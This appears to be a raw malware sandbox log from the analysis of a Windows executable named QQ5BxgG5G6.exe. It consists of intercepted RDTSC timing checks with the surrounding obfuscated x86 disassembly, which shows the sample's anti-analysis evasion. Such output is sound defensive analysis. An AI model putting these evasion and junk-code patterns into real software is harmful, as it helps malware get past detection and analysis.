              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF4004 second address: FF4044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and edx, 216C8860h 0x00000012 push dword ptr [ebp+122D3008h] 0x00000018 mov dh, cl 0x0000001a call 00007F88DC6CD039h 0x0000001f push esi 0x00000020 push edi 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop esi 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF4044 second address: FF405C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88DD0CB14Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF405C second address: FF4060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5956 second address: FF5972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB158h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5507 second address: FF5511 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F88DC6CD036h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF5511 second address: FF5531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F88DD0CB15Ah 0x0000000c jmp 00007F88DD0CB154h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF7495 second address: FF749D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF749D second address: FF74B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F88DD0CB146h 0x0000000d jc 00007F88DD0CB146h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203B0 second address: 53203B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203B4 second address: 53203CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203CA second address: 53203D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203D0 second address: 53203D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53203D4 second address: 5320481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov dx, cx 0x0000000d pushfd 0x0000000e jmp 00007F88DC6CD040h 0x00000013 and eax, 7F4B52A8h 0x00000019 jmp 00007F88DC6CD03Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 mov al, ACh 0x00000026 mov eax, edx 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F88DC6CD043h 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F88DC6CD044h 0x0000003a and cx, E768h 0x0000003f jmp 00007F88DC6CD03Bh 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F88DC6CD048h 0x0000004b sub ax, 39C8h 0x00000050 jmp 00007F88DC6CD03Bh 0x00000055 popfd 0x00000056 popad 0x00000057 mov ecx, dword ptr [ebp+08h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5320481 second address: 5320485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5320485 second address: 532048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 532048B second address: 5320491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534073B second address: 5340753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD044h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340753 second address: 5340771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F88DD0CB153h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340771 second address: 5340778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340778 second address: 534078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F88DD0CB14Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534078E second address: 5340794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340794 second address: 5340798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340798 second address: 53407E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, C72Ah 0x0000000f mov ebx, 24E82BF6h 0x00000014 popad 0x00000015 push esp 0x00000016 pushad 0x00000017 jmp 00007F88DC6CD048h 0x0000001c mov ch, EBh 0x0000001e popad 0x0000001f mov dword ptr [esp], ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F88DC6CD048h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53407E7 second address: 53407F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB14Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53407F9 second address: 5340876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov eax, 6CDDBBF9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F88DC6CD03Bh 0x00000016 sbb eax, 5B83CBEEh 0x0000001c jmp 00007F88DC6CD049h 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp], esi 0x00000027 jmp 00007F88DC6CD03Eh 0x0000002c lea eax, dword ptr [ebp-04h] 0x0000002f pushad 0x00000030 mov al, BEh 0x00000032 pushad 0x00000033 jmp 00007F88DC6CD049h 0x00000038 mov eax, 5A620647h 0x0000003d popad 0x0000003e popad 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340876 second address: 534087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 534087A second address: 5340880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340880 second address: 5340886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340886 second address: 53408A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F88DC6CD03Fh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408A5 second address: 53408A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408A9 second address: 53408AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408AF second address: 53408B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53408B5 second address: 53408B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340914 second address: 534091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409E3 second address: 53409E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409E9 second address: 53409ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409ED second address: 53409FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53409FC second address: 5340A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A02 second address: 5330150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 5239A3CCh 0x00000008 pushfd 0x00000009 jmp 00007F88DC6CD045h 0x0000000e sbb si, 94A6h 0x00000013 jmp 00007F88DC6CD041h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne al 0x00000026 jmp 00007F88DC6CD032h 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007F88DC6CD037h 0x0000002e sub esp, 04h 0x00000031 mov dword ptr [esp], 0000000Dh 0x00000038 call 00007F88E0CCA764h 0x0000003d mov edi, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F88DC6CD041h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330150 second address: 5330165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330165 second address: 5330176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bx, ax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330176 second address: 53301AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushfd 0x00000007 jmp 00007F88DD0CB159h 0x0000000c and eax, 410D40E6h 0x00000012 jmp 00007F88DD0CB151h 0x00000017 popfd 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53301AE second address: 533022E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F88DC6CD040h 0x00000008 and eax, 42DF2C88h 0x0000000e jmp 00007F88DC6CD03Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F88DC6CD046h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F88DC6CD040h 0x00000026 sub esp, 2Ch 0x00000029 jmp 00007F88DC6CD040h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov edi, ecx 0x00000032 mov ch, 16h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F88DC6CD03Eh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533022E second address: 5330232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330232 second address: 5330238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330238 second address: 5330275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 sbb cx, 06D8h 0x0000000e jmp 00007F88DD0CB14Bh 0x00000013 popfd 0x00000014 mov eax, 2BD7C98Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F88DD0CB151h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330275 second address: 5330285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD03Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302C0 second address: 53302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302C4 second address: 53302CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302CA second address: 53302F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 sbb cx, 4D28h 0x0000000e jmp 00007F88DD0CB14Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebx, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302F9 second address: 53302FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302FD second address: 5330303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330303 second address: 5330344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DC6CD044h 0x00000009 and ax, DAB8h 0x0000000e jmp 00007F88DC6CD03Bh 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F88DC6CD03Dh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330344 second address: 533034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533034A second address: 53303F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F88DC6CD03Ah 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c inc ebx 0x0000000d jmp 00007F88DC6CD03Ch 0x00000012 test al, al 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F88DC6CD03Eh 0x0000001b xor eax, 04C536A8h 0x00000021 jmp 00007F88DC6CD03Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F88DC6CD048h 0x0000002d and ecx, 3E012908h 0x00000033 jmp 00007F88DC6CD03Bh 0x00000038 popfd 0x00000039 popad 0x0000003a je 00007F88DC6CD1D5h 0x00000040 pushad 0x00000041 jmp 00007F88DC6CD044h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c popad 0x0000004d lea ecx, dword ptr [ebp-14h] 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F88DC6CD044h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53303F5 second address: 53303FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53303FB second address: 5330442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F88DC6CD03Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F88DC6CD03Bh 0x0000000f xor si, D40Eh 0x00000014 jmp 00007F88DC6CD049h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [ebp-14h], edi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330442 second address: 5330446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330446 second address: 533044C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533049D second address: 53304A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53304A1 second address: 53304A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53304A7 second address: 5330521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f mov bx, si 0x00000012 popad 0x00000013 jg 00007F894E9C9109h 0x00000019 jmp 00007F88DD0CB154h 0x0000001e js 00007F88DD0CB1BAh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edi 0x00000029 pushfd 0x0000002a jmp 00007F88DD0CB159h 0x0000002f and ecx, 59F29F26h 0x00000035 jmp 00007F88DD0CB151h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330521 second address: 53305C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F88DC6CD03Eh 0x00000011 jne 00007F894DFCAF8Ah 0x00000017 jmp 00007F88DC6CD040h 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f jmp 00007F88DC6CD040h 0x00000024 lea eax, dword ptr [ebp-2Ch] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F88DC6CD03Eh 0x0000002e or esi, 60062588h 0x00000034 jmp 00007F88DC6CD03Bh 0x00000039 popfd 0x0000003a mov bh, al 0x0000003c popad 0x0000003d push esp 0x0000003e jmp 00007F88DC6CD040h 0x00000043 mov dword ptr [esp], esi 0x00000046 pushad 0x00000047 call 00007F88DC6CD03Eh 0x0000004c mov ebx, ecx 0x0000004e pop esi 0x0000004f mov esi, edx 0x00000051 popad 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53305C8 second address: 53305CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533000A second address: 5330060 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F88DC6CD049h 0x00000008 sbb cx, 7326h 0x0000000d jmp 00007F88DC6CD041h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F88DC6CD03Eh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F88DC6CD03Eh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330060 second address: 5330076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330076 second address: 533007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533007A second address: 533007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533007E second address: 5330084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330084 second address: 5330104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F88DD0CB150h 0x00000010 xchg eax, ecx 0x00000011 jmp 00007F88DD0CB150h 0x00000016 push eax 0x00000017 pushad 0x00000018 mov dx, 6464h 0x0000001c popad 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f pushad 0x00000020 mov di, cx 0x00000023 popad 0x00000024 call 00007F88DD0CB14Dh 0x00000029 mov ah, D3h 0x0000002b pop edi 0x0000002c popad 0x0000002d mov dword ptr [ebp-04h], 55534552h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F88DD0CB154h 0x0000003d adc si, D978h 0x00000042 jmp 00007F88DD0CB14Bh 0x00000047 popfd 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330104 second address: 533010F instructions: 0x00000000 rdtsc 0x00000002 mov cx, 78AFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B29 second address: 5330B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B2F second address: 5330B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B33 second address: 5330B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F88DD0CB14Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
